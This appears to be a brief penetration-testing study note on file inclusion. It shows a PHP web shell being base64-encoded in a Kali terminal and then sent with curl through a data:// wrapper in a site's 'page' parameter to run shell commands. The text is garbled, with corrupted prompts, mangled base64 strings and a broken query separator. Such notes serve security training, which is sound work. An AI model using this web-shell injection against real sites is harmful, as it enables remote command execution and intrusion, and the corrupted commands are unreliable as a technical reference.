Remote File Inclusion


if remote-url-include is enabled:

kaliakali:~$ echo -n '<?php echo system($_GET[" cmd"]);?>' | base64
PD9waHAgZWNobyBzeXNOZW00JF9HRVRbImNtZCJdKTs/Pg==

kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=data://text/plain;bas
e64, PD9waHAgZWNobyBzeXNOZWOoJF9HRVRbImNtZCJdKTs/Pg==8cmd=ls"